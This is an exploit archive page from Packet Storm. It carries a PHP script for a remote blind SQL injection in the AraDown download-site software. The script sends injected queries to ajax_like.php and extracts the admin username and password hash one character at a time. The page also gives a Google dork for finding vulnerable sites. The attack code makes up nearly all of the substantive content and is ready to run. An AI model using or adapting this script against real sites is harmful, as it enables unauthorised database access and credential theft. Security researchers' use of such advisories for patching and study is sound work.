exploit the possibilities

AraDown Blind SQL Injection

AraDown Blind SQL Injection
Posted Aug 7, 2012
Authored by G-B

AraDown suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 6c30b677c0ba2bc5d3786ec00566a8a8

AraDown Blind SQL Injection

Change Mirror Download
<?php
echo "
_____ _ _ _____ _____ _______
/ ___| | | | | / _ \ / ___/|__ __|
| | _ | |__| | | | | | | |___ | |
| | | | | __ | | | | | \___ \ | |
| |_| | | | | | | |_| | ___| | | |
\_____/ |_| |_| \_____/ /_____/ |_|
____ _ _____ _____ _____ ___ ___
| _ \ | | / _ \ / _ \ | _ \ \ \ / /
| |_) | | | | | | | | | | | | | | \ \ \/ /
| _ ( | | | | | | | | | | | | | | \ /
| |_) | | |___ | |_| | | |_| | | |_| / | |
|____/ |_____| \_____/ \_____/ |_____/ |__|

[*]-----------------------------------------------------------------------[*]
# Exploit Title : ArDown (All Version) <- Remote Blind SQL Injection
# Google Dork : 'powered by AraDown'
# Date : 08/07/2012
# Exploit Author : G-B
# Email : g22b@hotmail.com
# Software Link : http://aradown.info/
# Version : All Version
[*]-----------------------------------------------------------------------[*]

[*] Target -> ";

$target = stdin();
$ar = array('1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');

echo "[*] Username : ";

for($i=1;$i<=30;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(username,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b) && $char == 'z'){
$i = 50;
break;
}
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}

echo "\n[*] Password : ";

for($i=1;$i<=32;$i++){
foreach($ar as $char){
$b = send('http://server',"3' and (select substr(password,$i,1) from aradown_admin)='$char' # ");
if(eregi('<span class="on_img" align="center"></span>',$b)) continue;
echo $char;
break;
}
}

function send($target,$query){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$target/ajax_like.php");
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,array('id'=>$query));
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$r = curl_exec($ch);
curl_close($ch);
return $r;
}
function stdin(){
$fp = fopen("php://stdin","r");
$line = trim(fgets($fp));
fclose($fp);
return $line;
}
?>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close